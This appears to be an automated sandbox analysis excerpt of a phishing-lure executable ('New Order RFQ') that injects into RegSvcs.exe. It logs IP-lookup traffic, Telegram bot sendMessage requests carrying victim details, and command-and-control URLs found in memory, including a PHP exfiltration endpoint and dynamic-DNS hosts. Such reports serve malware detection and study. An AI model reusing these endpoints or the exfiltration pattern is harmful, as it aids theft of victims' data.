              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49714 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49728 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007B22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_007B22EE
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2013/03/2025%20/%2003:21:21%0D%0ACountry%20Name:%20United%20States%0D%0A[%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2012/03/2025%20/%2023:34:06%0D%0ACountry%20Name:%20United%20States%0D%0A[%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 11 Mar 2025 08:05:25 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 11 Mar 2025 08:05:34 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: alarmingness.exe, 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3637703138.0000000000432000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
              Source: alarmingness.exe, 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3637703138.0000000000432000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
              Source: alarmingness.exe, 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3637703138.0000000000432000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
              Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
              Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgd
              Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
              Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
              Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
              Source: alarmingness.exe, 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3637703138.0000000000432000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
              Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
              Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
              Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: alarmingness.exe, 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3637703138.0000000000432000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
              Source: RegSvcs.exe, 0000000B.00000002.3641749864.0000000003F06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
              Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
              Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: alarmingness.exe, 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3637703138.0000000000432000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
              Source: RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20a
              Source: RegSvcs.exe, 0000000B.00000002.3641749864.0000000003F06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: RegSvcs.exe, 00000003.00000002.3642278898.0000000003D54000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3641749864.0000000003F06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: RegSvcs.exe, 00000003.00000002.3642278898.0000000003D54000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3641749864.0000000003F06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
              Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002D9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
              Source: RegSvcs.exe, 0000000B.00000002.3641749864.0000000003F06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: RegSvcs.exe, 00000003.00000002.3642278898.0000000003D54000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3641749864.0000000003F06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
              Source: RegSvcs.exe, 0000000B.00000002.3641749864.0000000003F06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: RegSvcs.exe, 0000000B.00000002.3641749864.0000000003F06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
              Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002AD2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002C83000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002CF3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: alarmingness.exe, 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002AD2000.00000004.00000800.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3637703138.0000000000432000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
              Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002AFC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002CF3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
              Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123h
              Source: RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123h6
              Source: RegSvcs.exe, 00000003.00000002.3642278898.0000000003D54000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3641749864.0000000003F06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
              Source: RegSvcs.exe, 00000003.00000002.3642278898.0000000003D54000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3641749864.0000000003F06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
              Source: RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002D3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
              Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002C1C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
